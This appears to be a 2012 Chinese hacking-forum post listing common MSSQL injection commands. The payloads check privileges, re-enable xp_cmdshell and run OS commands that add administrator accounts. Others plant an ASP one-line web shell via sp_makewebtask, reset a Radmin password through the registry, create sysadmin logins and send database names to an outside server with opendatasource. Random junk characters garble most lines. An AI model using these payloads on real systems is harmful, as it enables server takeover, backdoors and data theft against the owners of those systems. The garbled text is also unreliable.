找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2146|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
5 s6 Q/ {3 h. d1 uand 1=(Select IS_MEMBER('db_owner'))4 W: R; q; y& E
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
$ r1 m8 o8 n( {1 T9 Q- @2 a3 d* k: n) ^9 U5 i/ Y& b8 k2 [
//检测是否有读取某数据库的权限
1 o: D6 E- X- j8 P  land 1= (Select HAS_DBACCESS('master'))
+ g& o( O. a0 q  U% D& r( DAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --( ]; d/ t; S" }! l3 X+ k. M! ~
4 B! y: G) j( f! b# {
3 |/ R& H! t% s
数字类型5 r( M% q0 }9 t) \7 p1 u5 D9 c% J
and char(124)%2Buser%2Bchar(124)=0; d5 k2 |, l8 N- ^% l" J+ y# u

/ W5 c6 c  p5 t! k' _& M5 K+ S. v字符类型3 U8 v2 B0 O  j2 A' ~& |
' and char(124)%2Buser%2Bchar(124)=0 and ''='
& {( l2 {: P: f' Y- g) g. E1 V2 W
搜索类型/ ~4 V7 y+ x1 B4 e7 v
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 f# E' y, W: `5 z
  R  k0 X; L! w! Q爆用户名
( |: O" [( E/ k% {1 rand user>0
0 q7 ^. x3 C* T' t: g. k3 g: r' and user>0 and ''='/ B9 J1 m" V+ z4 d* _
- M7 Y3 |+ f$ a2 ?9 s+ Z" Q
检测是否为SA权限& N8 K  l  V( \" R8 G
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--: u- a7 J$ c  W1 G+ h7 {
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --/ A3 n, C: s4 x
* Z1 b2 N9 P9 p0 R! J4 F7 G
检测是不是MSSQL数据库) E" ^# s8 T, ]4 b: I
and exists (select * from sysobjects);--% F4 c* V/ U4 E5 p. Q) @. i9 `6 Q
( J+ s. d7 {' S/ e7 ~4 I; u4 U
检测是否支持多行3 K7 F5 D9 R- u/ B. v; Y
;declare @d int;--
# ?0 k$ P' t' J% j7 J7 ?' }! ?$ }( l1 z
恢复 xp_cmdshell1 P0 O, i8 }+ P# n  t8 f' m* B
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 J8 _; |  h, c) X7 `9 E9 y$ Q1 H# n7 g) I# w

: w) a% T* ~8 F  tselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
+ I& f- L: Q- ^, m% x0 A! l
& }/ ~8 U/ Q# Q) F0 v" k//-----------------------# ?) q) U7 ^9 i/ S: z1 ?
//       执行命令; ~, e; H4 g. _7 Q* q6 j3 {7 G3 U3 J
//-----------------------
6 f* |# u! p+ ~! f& o4 h- s首先开启沙盘模式:9 G2 [0 m1 N2 Y3 ?/ n& ~
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( i8 s: Q4 W2 ?* N+ q1 j# B+ T4 a/ B1 C# j4 o: c$ K5 T( G# N
然后利用jet.oledb执行系统命令
. r8 l/ u$ D3 {3 x3 H9 k) \2 lselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')6 G# r5 i2 k2 W$ `! G. o
; ?! ^2 q1 g" f4 D  a! {0 Y
执行命令) C* L- @4 }4 [6 s
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--$ J2 h# S9 @/ c* y* \# h0 k) {; E

) M& x" r# }4 @* xEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
. ?# [- ?$ \5 z1 S, F& F( q8 G! v) l
判断xp_cmdshell扩展存储过程是否存在:9 k# K* k: x$ @" K0 k$ ^! ?
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'): s/ |, Q! X% ?
; y0 u7 ]. z# l0 a3 U$ @: f
写注册表
. y1 K  Y+ W; F1 L4 x8 {exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 R( w, O/ m. y$ [3 h1 V6 @
$ n: F$ [; F+ {8 }2 ^; ?REG_SZ6 G  D, `+ ]. E% a
; [% T; o+ W7 \1 c; V7 A1 p
读注册表
: ]8 `" _. C5 W+ r& i3 G  Texec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'2 s2 V& ]3 \5 g3 I. k! ?

3 v; _1 ]; `6 m# `% b读取目录内容% |4 c9 W) s* x! X
exec master..xp_dirtree 'c:\winnt\system32\',1,15 K; X# f! T3 H+ t
* t. l/ n1 {) i/ G
, P6 X* u5 r# B
数据库备份) C7 X3 k: W( V& u/ p* ?* G; {
backup database pubs to disk = 'c:\123.bak'( l, a& n* }4 {: m$ n! d
; d2 I; a% p1 j( y2 ?
//爆出长度
) d# m  d- I" B6 W/ v( UAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
* G. m% F. V, J9 D! n: Z# L3 j$ S

; U1 w) ~! y* Z& O( L  G0 ?$ `
* v7 e! l% {/ n2 ^* w$ D& H更改sa口令方法:用sql综合利用工具连接后,执行命令:9 F. m6 t" b) \( L% E1 J9 W. E- k# l
exec sp_password NULL,'新密码','sa'
% p  z+ s& I, I8 M& J+ J6 v7 L$ Q5 A. k5 E( o$ [9 s1 H
添加和删除一个SA权限的用户test:4 _  J# [! a" l& u
exec master.dbo.sp_addlogin test,9530772
1 p: |+ z: `# C& p" b  [exec master.dbo.sp_addsrvrolemember test,sysadmin
9 }. k! F( Y% I3 ]3 i
0 z' W" V( y/ U6 J. s, ~( J8 w) p删除扩展存储过过程xp_cmdshell的语句:
4 h" `* e/ z" H) Z. uexec sp_dropextendedproc 'xp_cmdshell'
! n- X% j7 F$ x& T1 ^1 ?8 D9 u  q1 |, g) P4 I( X
添加扩展存储过过程7 ~  b' N# ~" I. z4 _( u; S
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'7 Y5 i9 A4 f# O6 q- L
GRANT exec On xp_proxiedadata TO public1 Z. V" Z+ i) [9 q: e" K
) U# [# ?1 z, {( E4 m4 W

! k& V& E! Q3 v  G' `停掉或激活某个服务。; o; R5 ~9 c& d: S( N

! \9 o2 n  d% v# Kexec master..xp_servicecontrol 'stop','schedule': y0 B& R5 w1 r& r
exec master..xp_servicecontrol 'start','schedule'+ _* t( ?# E1 W" m3 I

8 J2 t5 J, Y% T) l# S( a2 m7 Ldbo.xp_subdirs
, x" _1 M2 M. T7 w) {. c: K0 \' B6 x4 u0 V0 T( q8 g' f, o
只列某个目录下的子目录。
0 ?% X! e6 T0 v. ~1 c9 jxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'5 V! z: w* C% \& F- q4 o

* R$ I( h  y. ?8 y; c- y, Q) Idbo.xp_makecab
, M: n# G$ _7 d% e, ~5 P1 S$ Y
6 j$ ?) `1 l" N! q" z# e4 y9 S! M将目标多个档案压缩到某个目标档案之内。; g6 n2 L- @2 M) n; m
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
- L3 v% ^2 H' l5 m9 D
& j- u4 x  X! p, y; o- _5 m4 `# }dbo.xp_makecab7 t' H% u. Y% l; m# Y! s8 u% Z
'c:\test.cab','mszip',1,
/ G, y) i% g  X, y& r3 R4 p'C:\Inetpub\wwwroot\SQLInject\login.asp',: Q2 g7 `6 i' {4 Y
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
( W2 D: ~7 v1 q" l* c4 v4 A8 O/ t) ~& X& M( K0 h
xp_terminate_process: [. `# Y4 Y# ^& C( ]* c
) R; N4 H) c  ], D  ~; G1 v3 }1 D2 Y
停掉某个执行中的程序,但赋予的参数是 Process ID。6 m) I8 H/ |6 m
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
1 x: F. w- d2 l2 A5 d' a! v7 b7 {0 p: k# ^) d8 |0 f) f
xp_terminate_process 2484
' a+ T/ @/ `( J* b$ f! ^* r; T
4 O- Q  O' E% q) N+ t" R' O; pxp_unpackcab
' T( X5 I( s# f8 q( S7 z! {
0 H2 E) P6 ^" l) t* p5 c% R" Q解开压缩档。
6 o+ c0 z$ d' M6 ?% g. Q, {0 H7 H- p  r4 C* ~& P
xp_unpackcab 'c:\test.cab','c:\temp',18 t& l" {$ e. u  t5 j9 D( E

7 q( {6 a" L. U$ X' n: W# z& `' z7 j9 T3 T. U
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* d' _# k/ p7 I' i4 c: o% a9 Q" D& m$ g
/ O6 s+ ?( W: M; [create database lcx;" J' q8 L2 t: G& H
Create TABLE ku(name nvarchar(256) null);% R) O5 B7 E: K4 n/ }3 x3 o
Create TABLE biao(id int NULL,name nvarchar(256) null);. {. K  s/ q) U7 E4 F
' E( n. r( _3 e8 h
//得到数据库名, o- A3 u" z4 X; C* z5 h3 P
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases0 y9 n1 O# Y" |5 S5 U
2 X6 }: y8 P& c9 q% M( _1 ^
# I) Z+ g# \' O7 p; @! S/ v3 p( @( I
//在Master中创建表,看看权限怎样
' m( ?0 \- W/ E% m5 u3 h* K" B9 RCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--: q7 D) Y# H! E6 r' i
) D4 C) C3 D3 K9 p2 R8 A& B' V% I( ?
用 sp_makewebtask直接在web目录里写入一句话马:* s5 ]! s! c6 l, F) @7 O& E6 Z/ m
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--7 o- Y, M/ h6 o; d1 {9 W
* o, z  e) o+ ?4 d' r4 m1 b4 r" b$ q3 t
//更新表内容
& y; ]) W3 t5 r' J8 IUpdate films SET kind = 'Dramatic' Where id = 123
6 r" ~8 U( T/ F6 r- \2 a( x
/ M5 e+ I7 g: o5 @" Q5 f+ e0 o//删除内容
2 t8 A, C$ N) r/ s7 F4 W* Q# Vdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表